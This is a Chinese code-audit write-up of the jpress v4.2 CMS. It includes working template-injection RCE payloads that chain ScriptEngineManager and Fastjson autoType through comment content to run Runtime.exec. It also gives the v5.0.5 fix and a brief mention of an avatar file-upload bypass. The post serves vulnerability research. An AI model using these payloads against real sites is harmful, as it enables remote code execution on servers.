聲明

出品|先知社區(qū)(ID:1871162774168111）

以下內(nèi)容，來自先知社區(qū)的1871162774168111作者原創(chuàng)，由于傳播，利用此文所提供的信息而造成的任何直接或間接的后果和損失，均由使用者本人負責(zé)，長白山攻防實驗室以及文章作者不承擔(dān)任何責(zé)任。

0x01 前言

最近做CMS審計的時候恰好碰到了這么一個框架，學(xué)習(xí)漏洞不光是要會打，還要明白原理，結(jié)合網(wǎng)站可知；是用jpress V4.2搭建的，來學(xué)習(xí)一手。后面發(fā)現(xiàn)是就press3.0，我是小丑

jpress類似于WordPress Write in Java，和PHP的WordPress非常像。不過 Java搭建環(huán)境會比PHP要復(fù)雜一些，當時我自己也是因為環(huán)境搭建的問題卡了很久(非常多的問題，不只是maven，這一塊踩坑的師傅可以滴滴我

比起普通的SpringBoot搭建的Java環(huán)境相比，jpress使用的jBoot，和 SpringBoot十分類似，不過看點其他架構(gòu)寫的項目也是比較有趣。

0x02 環(huán)境搭建

這個項目的環(huán)境搭建會有點煩躁

項目地址：

https://github.com/JPressProjects/jpress

去到release頁面下，下載v4.2版本的，后續(xù)會對新版本當中的漏洞進行挖掘。下載完畢項目之后，先在項目界面輸入命令

mvn clean package

此處比較坑，我遇到的問題是

Failed to execute goal org.apache.maven.plugins:maven-jar-plugin:2.4:jar (default-jar) on project codegen: Execution default-jar of goal org.apache.maven.plugins:maven-jar-plugin:2.4:jar failed: A required class was missing while executing org.apache.maven.plugins:maven-jar-plugin:2.4:jar: org/codehaus/plexus/components/io/resources/PlexusIoResourceCollection

將存儲maven倉庫的所有庫都刪掉即可，接著再執(zhí)行命令即可。

搭建完畢之后創(chuàng)建數(shù)據(jù)庫，但不要導(dǎo)入文件，也不要修改任何配置，直接跑項目。

項目跑起來之后會訪問到http://localhos-t:8080/install下

0x03 代碼審計

代碼審計準備

架構(gòu)理解

jpress項目分為前臺頁面和后臺管理界面，前臺頁面是純前端的內(nèi)容，所以漏洞點主要是在后臺管理頁面這里。

在后臺管理界面這里，需要在模板--->所有模板中選擇對應(yīng)的模板，才能在前臺頁面看到一些漏洞的回顯。比如XXE，XSS這些，在公司測試的時候沒有注意到這一點，吃了些虧。

pom.xml與Filter等審計

查看父項目的pom.xml，發(fā)現(xiàn)用的都是最新版本的組件，理論上不存在組件漏洞。

此項目中不存在Filter，這就意味著很可能存在SQL注入或者是XSS

存在多module，需要我們對不同module功能塊進行審計，盡量從一個漏洞發(fā)現(xiàn)者的角度去看，這樣還是可以學(xué)到很多的。

模板渲染引起的RCE

影響接口

/admin/article/setting/admin/page/setting/admin/product/setting/admin/template/edit

在setting目錄下存在好幾處的模板渲染漏洞

0x04 漏洞分析

為什么想到這個漏洞呢？原因是在文------>設(shè)置這里面的"評論郵件通知管理員"中；官方給出了例子，告訴我們可以用#(comment.id)，那么猜測這里可能會存在模板渲染問題，此處對應(yīng)的模板是Velocity

進去看與文章評論相關(guān)的類，找到是這一個——io.jpress.module.article.controller.front.ArticleController，這里是有關(guān)于前臺頁面當中，對于文章的管理的一個類。我們在postComment()方法處下一個斷點，這個方法的作用主要是將評論信息保存到數(shù)據(jù)庫，同時還會發(fā)送短信通知網(wǎng)站管理員。

接著發(fā)布一條評論，來看一看它的運行流程。

前面是一系列的賦值與基礎(chǔ)判斷，有興趣的師傅們可以自行調(diào)試看一下，屬于是很簡單的部分。直接看重點部分，第268行。

eval:81, Method (com.jfinal.template.expr.ast)assignVariable:102, Assign (com.jfinal.template.expr.ast)eval:95, Assign (com.jfinal.template.expr.ast)exec:57, Set (com.jfinal.template.stat.ast)exec:68, StatList (com.jfinal.template.stat.ast)render:74, Template (com.jfinal.template)renderToString:91, Template (com.jfinal.template)doSendEmail:91, ArticleNotifyKit (io.jpress.module.article.kit)lambda$byEmail$16:70, ArticleNotifyKit (io.jpress.module.article.kit)run:-1, 1607068801 (io.jpress.module.article.kit.ArticleNotifyKit$$Lambda$79)runWorker:1142, ThreadPoolExecutor (java.util.concurrent)run:617, ThreadPoolExecutor$Worker (java.util.concurrent)run:745, Thread (java.lang)

此處就可以很明顯的看到存在反射調(diào)用任意類的命令執(zhí)行漏洞

在Velocity 中?"#"?用來標識Velocity的腳本語句，包括#set、#if 、#else、#end、#foreach、#end、#iinclude、#parse、#macro等；如：

#if($info.imgs) <img src="$info.imgs" border=0> #else <img src="noPhoto.jpg"> #end在這一個PoC當中，我們可以借助Fastjson的特性輔助攻擊。

構(gòu)造PoC如下，并將它插入到評論的內(nèi)容當中。

#set(x=net.sf.ehcache.util.ClassLoaderUtil::createNewInstance("javax.script.ScriptEngineManager"))#set(e=x.getEngineByName("js"))#(e.eval('java.lang.Runtime.getRuntime().exec("calc")'))

#set(str=comment.content)#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance()) #(x.setAutoTypeSupport(true)) #set(sem=str.substring(0, str.indexOf(124)))#set(str=str.substring(str.indexOf(124)+1))#(x.addAccept(sem)) #set(json=str.substring(0, str.indexOf(124)))#set(str=str.substring(str.indexOf(124)+1))#set(x=com.alibaba.fastjson.JSON::parse(json))#set(js=str.substring(0, str.indexOf(124)))#set(str=str.substring(str.indexOf(124)+1))#set(e=x.getEngineByName(js)) #(e.eval(str))

因為后端在渲染模板時將comment對象傳入了，所以我們可以獲取 comment.content，而這個值又是在評論時可控的，配合Fastjson打。

在評論的地方構(gòu)造payload

javax.script.ScriptEngineManager|{"@type":"javax.script.ScriptEngineManager"}|js|java.lang.Runtime.getRuntime().exec("calc")

0x05漏洞修復(fù)

我認為的修復(fù)方式會比較貼近Velocity的一些修復(fù)方式，而Velocity到目前最新版本也沒有提供沙盒或者防御方式，只能禁止或嚴格過濾用戶輸入進入 Velocity.evaluate。但是這一框架是作者團隊自己編寫的，并非Velocity

但是在這一個項目當中，我們可以去看一下jpress V5.0.5的版本當中是如何修復(fù)的，這個地方當時自己找的時候花了很久時間。

jpress V5.0.5，也就是最新版本當中，是通過轉(zhuǎn)義字符來修補這個漏洞的。挺妙的，代碼量小且利用效率高，很強。它的修補手段是在getPara()方法處先做一個轉(zhuǎn)義，具體代碼的調(diào)用棧如下

cleanXss:79, XSSHttpServletRequestWrapper (io.jboot.web.xss)getParameter:32, XSSHttpServletRequestWrapper (io.jboot.web.xss)getParameter:161, ServletRequestWrapper (javax.servlet)getPara:189, Controller (com.jfinal.core)postComment:148, ArticleController (io.jpress.module.article.controller.front)

0x06前臺任意文件上傳漏洞

影響接口/ucenter/avatar

漏洞影響域在/ucenter/avatar下，這里對應(yīng)的接口找了很久，最后終于找到是在

io.jpress.web.commons.controller.AttachmentController#upload處

漏洞分析

產(chǎn)生漏洞的根本原因是，Web應(yīng)用程序允許上傳一個file[]數(shù)組，而非單個文件，從而我們可以構(gòu)造多個文件同時上傳來繞過。

歡迎關(guān)注長白山攻防實驗室微信公眾號

定期更新優(yōu)質(zhì)文章分享